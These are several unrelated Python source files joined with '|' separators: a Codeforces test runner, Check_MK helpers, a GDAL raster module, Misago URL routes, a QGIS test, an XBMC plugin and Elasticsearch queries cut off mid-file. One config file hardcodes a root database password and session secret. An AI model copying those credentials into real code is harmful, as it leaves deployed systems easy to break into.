compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
'''
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
'''
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
import test.configure
|
import argparse
import sys
import os
import httplib
import time
from subprocess import call
from HTMLParser import HTMLParser
class asciicolors:
RESET = "\033[0m"
BLACK = "\033[30m"
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BLUE = "\033[34m"
MAGENTA = "\033[35m"
CYAN = "\033[36m"
WHITE = "\033[37m"
BOLDBLACK = "\033[1m\033[30m"
BOLDRED = "\033[1m\033[31m"
BOLDGREEN = "\033[1m\033[32m"
BOLDYELLOW = "\033[1m\033[33m"
BOLDBLUE = "\033[1m\033[34m"
BOLDMAGENTA = "\033[1m\033[35m"
BOLDCYAN = "\033[1m\033[36m"
BOLDWHITE = "\033[1m\033[37m"
if not os.path.exists('.local_cache'):
os.mkdir('.local_cache')
parser = argparse.ArgumentParser(
prog = 'cfcl',
description = 'Codeforces command line toolchain')
parser.add_argument('--pid')
contest_id = -1
try:
contest_id = open('.local_cache/contest.cfg', 'r').read()
except:
pass
parser.add_argument('--cid')
parser.add_argument('--test',
dest='test',
action='store_const',
const='True',
default='False')
parser.add_argument('-p',
dest='pid')
parser.add_argument('-c',
dest='cid')
parser.add_argument('-t',
dest='test',
action='store_const',
const='True',
default='False')
parser.add_argument('tests_subset',
metavar='tests', type=int, nargs='*', default=[])
args = parser.parse_args()
tests_subset = args.tests_subset
run_tests = args.test
problem_id = args.pid
if args.cid:
contest_id = args.cid
if contest_id:
open('.local_cache/contest.cfg', 'w').write(contest_id)
if not contest_id:
print "Please provide contest id via --cid flag"
exit()
if not problem_id:
print "Please choose problem [A, B, C, D, E] to work with via --pid flag"
exit()
if not problem_id in {'A', 'B', 'C', 'D', 'E'}:
print "Provide correct problem id (A, B, C, D, E) provided: %s" % pid
exit()
if run_tests == 'False':
os.system('rm a.out; g++ -O2 -DSHTRIX %s.cpp; ./a.out' % problem_id)
exit()
total_time_elapsed = time.time()
print "Running %s%s problem, expecting source filename %s.cpp" % (
contest_id, problem_id, problem_id)
local_cache = '.local_cache/cached%sx%s' % (contest_id, problem_id)
if not os.path.exists(local_cache):
cf_template = "/contest/%s/problem/%s"
url = cf_template % (contest_id, problem_id)
h = httplib.HTTPConnection('codeforces.com', timeout=1)
cnt = 0
while cnt < 10:
try:
h.request('GET', url)
response = h.getresponse()
except Exception as e:
print e
exit()
if response.status != 200:
print "Error occured while connecting by url: %s" % url
cnt += 1
else:
break
if cnt == 10:
print "Unable to connect to codeforces."
page = response.read()
class SampleParser(HTMLParser):
results = []
current = []
stack = []
search_tag = ""
read_now = False
def __init__(self, _search_tag):
self.results = []
self.current = []
self.stack = []
self.read_now = False
self.search_tag = _search_tag
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if self.read_now:
self.stack.append(tag)
for (x, y) in attrs:
if x == 'class' and y == self.search_tag:
self.read_now = True
self.stack.append(tag)
def handle_endtag(self, tag):
if self.stack and self.stack[-1] == tag:
self.stack.pop()
if len(self.stack) == 0 and self.read_now:
self.read_now = False
self.results.append('\n'.join(self.current))
self.current = []
def handle_data(self, data):
if self.read_now:
if self.stack and self.stack[-1] == 'pre':
self.current.append(data)
def feedx(self, str):
self.feed(str)
return self.results
inputs = SampleParser('input').feedx(page)
outputs = SampleParser('output').feedx(page)
if len(inputs) != len(outputs):
print "ooops... something went wrong while parsing input/output"
print "check if problem input/output doesn't \
contain special characters e.g. '<'"
exit()
open(local_cache, 'w').write(str(len(inputs)))
for i in xrange(0, len(inputs)):
open('.local_cache/%sx%s%d.in' % (contest_id, problem_id, i), 'w').write(inputs[i])
open('.local_cache/%sx%s%d.out' % (contest_id, problem_id, i), 'w').write(outputs[i].strip())
testcases_num = open(local_cache, 'r').read()
try:
testcases_num = int(testcases_num)
except:
print "wrong format for file %s" % local_cache
exit()
testcases = []
for i in xrange(0, testcases_num):
testcases.append(
(i,
open('.local_cache/%sx%s%d.in' % (contest_id, problem_id, i)).read(),
open('.local_cache/%sx%s%d.out' % (contest_id, problem_id, i)).read()
)
)
compilation_line = 'rm a.out; g++ -O2 -DONLINE_JUDGE %s.cpp' % problem_id
ret = os.system(compilation_line)
if ret:
exit()
def shift_tab(answer):
return '\n'.join([('\t%s' % x) for x in answer.split('\n') if x])
for (id, input, output) in testcases:
if not tests_subset or id in tests_subset:
open('testcase.in', 'w').write(input)
time_elapsed = time.time()
os.system('./a.out < testcase.in > testcase.out')
time_elapsed = time.time() - time_elapsed
answer = open('testcase.out', 'r').read().strip()
if answer == output:
print "%s[%d] %sPASSED%s (in %.2lf seconds)" % (
asciicolors.BOLDMAGENTA, id, asciicolors.GREEN, asciicolors.RESET, time_elapsed)
else:
print "%s[%d] %sFAILED%s" % (
asciicolors.BOLDMAGENTA, id, asciicolors.RED, asciicolors.RESET)
print shift_tab("Received:")
print shift_tab(shift_tab(answer))
print shift_tab("Expected:")
print shift_tab(shift_tab(output))
total_time_elapsed = time.time() - total_time_elapsed
print "Finished executing script in %.3lf" % total_time_elapsed
|
'''
Default configurations.
'''
configs = {
'db': {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': 'password',
'database': 'weixin'
},
'session': {
'secret': 'hustraiet'
}
}
|
import grp, defaults, pprint, os, errno, gettext, marshal, fcntl, __builtin__
nagios_state_names = { -1: "NODATA", 0: "OK", 1: "WARNING", 2: "CRITICAL", 3: "UNKNOWN", 4: "DEPENDENT" }
nagios_short_state_names = { -1: "PEND", 0: "OK", 1: "WARN", 2: "CRIT", 3: "UNKN", 4: "DEP" }
nagios_short_host_state_names = { 0: "UP", 1: "DOWN", 2: "UNREACH" }
class MKGeneralException(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return str(self.reason)
class MKAuthException(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return str(self.reason)
class MKUnauthenticatedException(MKGeneralException):
pass
class MKConfigError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
class MKUserError(Exception):
def __init__(self, varname, msg):
self.varname = varname
self.message = msg
Exception.__init__(self, msg)
class MKInternalError(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def make_nagios_directory(path):
if not os.path.exists(path):
parent_dir, lastpart = path.rstrip('/').rsplit('/', 1)
make_nagios_directory(parent_dir)
try:
os.mkdir(path)
gid = grp.getgrnam(defaults.www_group).gr_gid
os.chown(path, -1, gid)
os.chmod(path, 0770)
except Exception, e:
raise MKConfigError("Your web server cannot create the directory <tt>%s</tt>, "
"or cannot set the group to <tt>%s</tt> or cannot set the permissions to <tt>0770</tt>. "
"Please make sure that:<ul><li>the base directory is writable by the web server.</li>"
"<li>Both Nagios and the web server are in the group <tt>%s</tt>.</ul>Reason: %s" % (
path, defaults.www_group, defaults.www_group, e))
def make_nagios_directories(name):
head, tail = os.path.split(name)
if not tail:
head, tail = os.path.split(head)
if head and tail and not os.path.exists(head):
try:
make_nagios_directories(head)
except os.OSError, e:
# be happy if someone already created the path
if e.errno != errno.EEXIST:
raise
if tail == ".": # xxx/newdir/. exists if xxx/newdir exists
return
make_nagios_directory(name)
def create_user_file(path, mode):
f = file(path, mode, 0)
gid = grp.getgrnam(defaults.www_group).gr_gid
# Tackle user problem: If the file is owned by nagios, the web
# user can write it but cannot chown the group. In that case we
# assume that the group is correct and ignore the error
try:
os.chown(path, -1, gid)
os.chmod(path, 0660)
except:
pass
return f
def write_settings_file(path, content):
create_user_file(path, "w").write(pprint.pformat(content) + "\n")
def savefloat(f):
try:
return float(f)
except:
return 0.0
def load_web_plugins(forwhat, globalvars):
plugins_path = defaults.web_dir + "/plugins/" + forwhat
fns = os.listdir(plugins_path)
fns.sort()
for fn in fns:
file_path = plugins_path + "/" + fn
if fn.endswith(".py"):
if not os.path.exists(file_path + "c"):
execfile(file_path, globalvars)
elif fn.endswith(".pyc"):
code_bytes = file(file_path).read()[8:]
code = marshal.loads(code_bytes)
exec code in globalvars
if defaults.omd_root:
local_plugins_path = defaults.omd_root + "/local/share/check_mk/web/plugins/" + forwhat
if local_plugins_path != plugins_path: # honor ./setup.sh in site
if os.path.exists(local_plugins_path):
fns = os.listdir(local_plugins_path)
fns.sort()
for fn in fns:
file_path = local_plugins_path + "/" + fn
if fn.endswith(".py"):
execfile(file_path, globalvars)
elif fn.endswith(".pyc"):
code_bytes = file(file_path).read()[8:]
code = marshal.loads(code_bytes)
exec code in globalvars
def get_language_dirs():
dirs = [ defaults.locale_dir ]
if defaults.omd_root:
dirs.append(defaults.omd_root + "/local/share/check_mk/locale")
return dirs
def get_language_alias(lang):
alias = lang
for lang_dir in get_language_dirs():
try:
alias = file('%s/%s/alias' % (lang_dir, lang), 'r').read().strip()
except (OSError, IOError):
pass
return alias
def get_languages():
# Add the hard coded english language to the language list
# It must be choosable even if the administrator changed the default
# language to a custom value
languages = [ (None, _('English')) ]
for lang_dir in get_language_dirs():
try:
languages += [ (val, get_language_alias(val))
for val in os.listdir(lang_dir) if not '.' in val ]
except OSError:
# Catch "OSError: [Errno 2] No such file or
# directory:" when directory not exists
pass
return languages
def load_language(lang):
# Make current language globally known to all of our modules
__builtin__.current_language = lang
if lang:
locale_base = defaults.locale_dir
local_locale_path = defaults.omd_root + "/local/share/check_mk/locale"
po_path = '/%s/LC_MESSAGES/multisite.mo' % lang
# Use file in OMD local strucuture when existing
if os.path.exists(local_locale_path + po_path):
locale_base = local_locale_path
try:
i18n = gettext.translation('multisite', locale_base, languages = [ lang ], codeset = 'UTF-8')
i18n.install(unicode = True)
except IOError, e:
# Fallback to non localized multisite
# I'd prefer to fallback to multisite default language but can not import config module here
__builtin__.current_language = None
else:
# Replace the _() function to disable i18n again
__builtin__._ = lambda x: x
def pnp_cleanup(s):
return s \
.replace(' ', '_') \
.replace(':', '_') \
.replace('/', '_') \
.replace('\\', '_')
def format_exception():
import traceback, StringIO, sys
txt = StringIO.StringIO()
t, v, tb = sys.exc_info()
traceback.print_exception(t, v, tb, None, txt)
return txt.getvalue()
def saveint(x):
try:
return int(x)
except:
return 0
def set_is_disjoint(a, b):
for elem in a:
if elem in b:
return False
return True
g_aquired_locks = []
g_locked_paths = []
def aquire_lock(path):
if path in g_locked_paths:
return # No recursive locking
fd = os.open(path, os.O_RDONLY)
fcntl.flock(fd, fcntl.LOCK_EX)
g_aquired_locks.append(fd)
g_locked_paths.append(path)
def release_all_locks():
global g_aquired_locks, g_locked_paths
for fd in g_aquired_locks:
os.close(fd)
g_aquired_locks = []
g_locked_paths = []
|
from pydynamind import *
import gdal, osr
from gdalconst import *
import struct
class DM_ValueFromRaster(Module):
display_name = "Value From Raster"
group_name = "Network Generation"
def getHelpUrl(self):
return "/DynaMind-GDALModules/dm_value_from_raster.html"
def __init__(self):
Module.__init__(self)
self.setIsGDALModule(True)
self.createParameter("view_name", STRING)
self.view_name = "node"
self.createParameter("attribute_name", STRING)
self.attribute_name = "value"
self.createParameter("raster_file", FILENAME)
self.raster_file = ""
def init(self):
self.node_view = ViewContainer(self.view_name, NODE, READ)
self.node_view.addAttribute(self.attribute_name, Attribute.DOUBLE, WRITE)
self.catchment_view = ViewContainer("city", FACE, READ)
self.registerViewContainers([self.node_view, self.catchment_view])
def run(self):
dataset = gdal.Open( self.raster_file, GA_ReadOnly)
if not dataset:
log("Failed to open file", Error)
self.setStatus(MOD_EXECUTION_ERROR)
return
band = dataset.GetRasterBand(1)
gt = dataset.GetGeoTransform()
srs = osr.SpatialReference()
srs.ImportFromWkt(dataset.GetProjection())
srsLatLong = osr.SpatialReference()
srsLatLong.ImportFromEPSG(self.getSimulationConfig().getCoorindateSystem())
#(353136,5776456)
ct = osr.CoordinateTransformation(srsLatLong, srs)
inMemory = True
if inMemory:
for c in self.catchment_view:
geom = c.GetGeometryRef()
env = geom.GetEnvelope()
p1 = ct.TransformPoint(env[0], env[2])
p2 = ct.TransformPoint(env[1], env[3])
minx = int((p1[0]-gt[0])/gt[1])
miny = int((p1[1]-gt[3])/gt[5])
maxx = int((p2[0]-gt[0])/gt[1])
maxy = int((p2[1]-gt[3])/gt[5])
if miny > maxy:
min_y_tmp = miny
miny = maxy
maxy = min_y_tmp
log("swapsy", Standard)
minx -= 5
miny -= 5
maxx += 5
maxy += 5
print(str(minx) + "/" + str(miny)+ "/" + str(maxx)+ "/" + str(maxy), maxx-minx, maxy-miny)
log(str(minx) + "/" + str(miny)+ "/" + str(maxx)+ "/" + str(maxy), Standard)
values = band.ReadAsArray(minx, miny, maxx-minx, maxy-miny)
for node in self.node_view:
geom = node.GetGeometryRef()
point = ct.TransformPoint(geom.GetX(), geom.GetY())
x = (point[0]-gt[0])/gt[1]
y = (point[1]-gt[3])/gt[5]
if inMemory:
val = values[int(y)-miny][int(x)-minx]
#print val.item()
node.SetField(self.attribute_name, val.item())
else:
datatype = band.DataType
scanline = band.ReadRaster( int(x), int(y), 1, 1, 1, 1, datatype)
if not scanline:
log("No value found for " + str(x) + "," + str(y), Warning)
continue
if datatype == GDT_Int32:
tuple_of_floats = struct.unpack('i' * 1, scanline)
elif datatype == GDT_Float32:
tuple_of_floats = struct.unpack('f' * 1, scanline)
else:
log("Datatype " + str(datatype) + " not supported", Error)
self.node_view.finalise()
return
self.node_view.finalise()
self.catchment_view.finalise()
|
import argparse
import logging
import dedoelen
from dedoelen.core import calendar
from dedoelen.core import scraper
from dedoelen.core import parser
from dedoelen.core import update
from dedoelen.core.conf import settings
from dedoelen.utils.localize import set_locale
from dedoelen.utils.log import init_logger
class Main(object):
def __init__(self):
set_locale()
self.version = dedoelen.get_version()
def parse_cmdline(self):
"""
Parse the commandline arguments. Verbosity is translated as the
logger flushlevel. Two actions are possible: 'init' creates an
entirely new calendar, and 'update' updates an existing one.
"""
argp = argparse.ArgumentParser()
argp.add_argument("action",
help="specify the action to perform (init|update)")
argp.add_argument("-v", "--verbose", action="store_true",
help="increase output verbosity")
argp.add_argument("-l", "--logfile", type=str,
help="logfile to write to")
args = argp.parse_args()
if args.verbose:
init_logger("INFO", logfile=args.logfile)
else:
init_logger("ERROR", logfile=args.logfile)
logger = logging.getLogger(__name__)
if args.action == 'init':
logger.info("Running action initialize")
self.initialize()
elif args.action == 'update':
logger.info("Running action update")
self.update()
else:
raise ValueError("action can be either 'init' or 'update'")
def initialize(self):
"""
Initialize a new calendar.
"""
urls = scraper.scrape_rss()
pages = scraper.scrape_html(urls)
voorstellingen = [parser.html2voorstelling(x) for x in pages]
voorstellingen = [x for x in voorstellingen if x is not None]
cal = calendar.make_calendar(voorstellingen)
self.write_cal(cal)
def update(self):
"""
Update an existing calendar.
"""
urls = scraper.scrape_rss()
pages = scraper.scrape_html(urls)
voorstellingen = [parser.html2voorstelling(x) for x in pages]
voorstellingen = [x for x in voorstellingen if x is not None]
voorstellingen = update.update_voorstellingen(voorstellingen)
cal = calendar.make_calendar(voorstellingen)
self.write_cal(cal)
def write_cal(self, calendar):
"""
Write calendar to file.
:param calendar: calendar object that is written to a file
:type calendar: :class:`icalendar.Calendar`
"""
with open(settings.OUTFILE, "wb") as fid:
fid.write(calendar.to_ical())
def __call__(self):
try:
return self.parse_cmdline()
except KeyboardInterrupt:
print("*** interrupted")
return 2
|
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from misago.admin import ADMIN_PATH, site
urlpatterns = patterns('misago.apps',
url(r'^$', 'index.index', name="index"),
url(r'^read-all/$', 'readall.read_all', name="read_all"),
url(r'^register/$', 'register.views.form', name="register"),
url(r'^attachment/(?P<attachment>[0-9a-zA-Z]{8})/$', 'attachments.server', name="attachments_server"),
url(r'^attachment/thumb/(?P<attachment>[0-9a-zA-Z]{8})/$', 'attachments.server', name="attachments_thumbs_server", kwargs={'thumb': True}),
url(r'^category/(?P<slug>(\w|-)+)-(?P<forum>\d+)/$', 'category.category', name="category"),
url(r'^redirect/(?P<slug>(\w|-)+)-(?P<forum>\d+)/$', 'redirect.redirect', name="redirect"),
url(r'^alerts/$', 'alerts.alerts', name="alerts"),
url(r'^alerts/clear-recent/$', 'alerts.clear_recent', name="alerts_clear_recent"),
url(r'^news/$', 'newsfeed.newsfeed', name="newsfeed"),
url(r'^tos/$', 'tos.tos', name="tos"),
url(r'^markdown/$', 'help.markdown', name="help_md"),
url(r'^forum-map/$', 'forummap.forum_map', name="forum_map"),
url(r'^popular/$', 'popularthreads.popular_threads', name="popular_threads"),
url(r'^popular/(?P<page>[1-9]([0-9]+)?)/$', 'popularthreads.popular_threads', name="popular_threads"),
url(r'^new/$', 'newthreads.new_threads', name="new_threads"),
url(r'^new/(?P<page>[1-9]([0-9]+)?)/$', 'newthreads.new_threads', name="new_threads"),
url(r'^warn-user/(?P<slug>\w+)-(?P<user>\d+)/', 'warnuser.views.warn_user', name="warn_user"),
)
urlpatterns += patterns('',
(r'^', include('misago.apps.signin.urls')),
(r'^users/', include('misago.apps.profiles.urls')),
url(r'^users/(?P<username>\w+)-(?P<user>\d+)/destroy/', 'misago.apps.destroyuser.destroy_user', name="destroy_user"),
(r'^usercp/', include('misago.apps.usercp.urls')),
(r'^activate/', include('misago.apps.activation.urls')),
(r'^watched-threads/', include('misago.apps.watchedthreads.urls')),
(r'^reset-password/', include('misago.apps.resetpswd.urls')),
(r'^private-threads/', include('misago.apps.privatethreads.urls')),
(r'^reports/', include('misago.apps.reports.urls')),
(r'^search/', include('misago.apps.search.urls')),
(r'^', include('misago.apps.threads.urls')),
)
handler403 = 'misago.apps.errors.error403'
handler404 = 'misago.apps.errors.error404'
import warnings
from urlparse import urlparse
if not settings.DEBUG and not urlparse(settings.MEDIA_URL).netloc:
warnings.warn('Sharing same domain name between application and user uploaded media is a security risk. Create a subdomain pointing to your media directory (eg. "uploads.myforum.com") and change your MEDIA_URL.', RuntimeWarning)
|
"""QGIS Unit tests for QgsClassificationMethod implementations
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Denis Rouzaud'
__date__ = '3/09/2019'
__copyright__ = 'Copyright 2019, The QGIS Project'
import qgis # NOQA
from qgis.PyQt.QtCore import QLocale
from qgis.testing import unittest, start_app
from qgis.core import QgsClassificationMethod, QgsClassificationLogarithmic, QgsFeature, QgsVectorLayer, QgsPointXY, \
QgsGeometry
start_app()
def createMemoryLayer(values):
ml = QgsVectorLayer("Point?crs=epsg:4236&field=id:integer&field=value:double",
"test_data", "memory")
# Data as list of x, y, id, value
assert ml.isValid()
pr = ml.dataProvider()
fields = pr.fields()
id = 0
for value in values:
id += 1
feat = QgsFeature(fields)
feat['id'] = id
feat['value'] = value
g = QgsGeometry.fromPointXY(QgsPointXY(id / 100, id / 100))
feat.setGeometry(g)
pr.addFeatures([feat])
ml.updateExtents()
return ml
class TestQgsClassificationMethods(unittest.TestCase):
def testQgsClassificationLogarithmic(self):
values = [2746.71,
66667.49,
77282.52,
986567.01,
1729508.41,
9957836.86,
35419826.29,
52584164.80,
296572842.00]
vl = createMemoryLayer(values)
m = QgsClassificationLogarithmic()
r = m.classes(vl, 'value', 8)
self.assertEqual(len(r), 6)
self.assertEqual(r[0].label(), '{} - 10^4'.format(QLocale().toString(2746.71)))
self.assertEqual(QgsClassificationMethod.rangesToBreaks(r),
[10000.0, 100000.0, 1000000.0, 10000000.0, 100000000.0, 1000000000.0])
self.assertEqual(len(m.classes(vl, 'value', 4)), 4)
def testQgsClassificationLogarithmic_FilterZeroNeg(self):
values = [-2, 0, 1, 7, 66, 555, 4444]
vl = createMemoryLayer(values)
m = QgsClassificationLogarithmic()
m.setParameterValues({'FILTER_ZERO_NEG_VALUES': True})
r = m.classes(vl, 'value', 4)
self.assertEqual(len(r), 4)
self.assertEqual(r[0].label(), '1 - 10^1')
self.assertEqual(QgsClassificationMethod.rangesToBreaks(r), [10.0, 100.0, 1000.0, 10000.0])
if __name__ == "__main__":
unittest.main()
|
import globalvar
import simplejson as json
import os
import xbmcgui
def list_shows(channel,folder):
shows=[]
if folder=='none':
shows.append( [channel,'show_folder', 'By Show','','folder'] )
shows.append( [channel,'unseen', 'All Unseen Episodes','','shows'] )
elif folder=='show_folder':
if os.path.exists(globalvar.FAVOURITES_FILE) :
#Read favourites
fileFav=open(globalvar.FAVOURITES_FILE)
jsonfav = json.loads(fileFav.read())
shows = jsonfav['favourites']
fileFav.close()
return shows
def list_videos(channel,show_title):
videos=[]
if show_title=='unseen':
if os.path.exists(globalvar.FAVOURITES_FILE) :
#Read favourites
fileFav=open(globalvar.FAVOURITES_FILE)
jsonfav = json.loads(fileFav.read())
pDialog = xbmcgui.DialogProgress()
ret = pDialog.create( 'Getting list of episodes', '' )
i=1
for show_folder in jsonfav['favourites']:
pDialog.update((i-1)*100/len(jsonfav['favourites']), 'Checking shows: '+ show_folder[2] + ' - ' + str(i) + '/' + str(len(jsonfav['favourites'])))
videos+=(list_videos(show_folder[0],show_folder[1]));
i+=1
fileFav.close()
pDialog.close()
else:
print str(channel) + ' : ' + show_title
videos=globalvar.channels[channel][3].list_videos(channel,show_title)
return videos
def add_favourite(channel,param,display):
result=''
shows=list_shows('none','show_folder')
for show in shows:
if show[0]==channel and show[1]==param:
result='Show already in list'
if result=='':
shows.append( [channel,param, display,'','shows'] )
f1=open(globalvar.FAVOURITES_FILE, 'w+')
print >>f1, json.dumps({'favourites': shows})
result='Show added to Favourites'
return result
def rem_favourite(channel,param):
result=''
shows=list_shows('none','show_folder')
for show in shows:
print str(channel) + ':' + param
print str(show[0]) + ':' + show[1]
if show[0]==channel and show[1]==param:
shows.remove(show)
f1=open(globalvar.FAVOURITES_FILE, 'w+')
print >>f1, json.dumps({'favourites': shows})
result='Removed From Favourites'
return result
|
import sys
import os
import re
import json
from collections import OrderedDict
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
from elasticsearch import Elasticsearch
es_host = 'localhost:9200'
es_type = "donor"
es = Elasticsearch([es_host])
es_queries = [
# order of the queries is important
# query 0: live_alignment_completed_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "gnos_repos_with_complete_alignment_set",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
# es_query for specimen counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"normal_exists_in_gnos_repo": {
"terms": {
"field": "normal_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
},
"tumor_specimens": {
"nested": {
"path": "tumor_alignment_status",
},
"aggs":{
"tumor_exists_in_gnos_repo":{
"terms": {
"field": "tumor_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 1: live_aligned_sanger_variant_not_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "gnos_repos_with_complete_alignment_set",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_sanger_variant_calling_performed": [
"F"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
# es_query for specimen counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"normal_exists_in_gnos_repo": {
"terms": {
"field": "normal_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
},
"tumor_specimens": {
"nested": {
"path": "tumor_alignment_status",
},
"aggs":{
"tumor_exists_in_gnos_repo":{
"terms": {
"field": "tumor_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_sanger_variant_calling_performed": [
"F"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 2: live_sanger_variant_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "variant_calling_results.sanger_variant_calling.gnos_repo",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_sanger_variant_calling_performed": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 3: live_aligned_dkfz/embl_not_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "gnos_repos_with_complete_alignment_set",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"bool": {
"should":[
{
"terms": {
"flags.is_dkfz_variant_calling_performed": [
"F"
]
}
},
{
"terms": {
"flags.is_embl_variant_calling_performed": [
"F"
]
}
}
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
# es_query for specimen counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"normal_exists_in_gnos_repo": {
"terms": {
"field": "normal_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
},
"tumor_specimens": {
"nested": {
"path": "tumor_alignment_status",
},
"aggs":{
"tumor_exists_in_gnos_repo":{
"terms": {
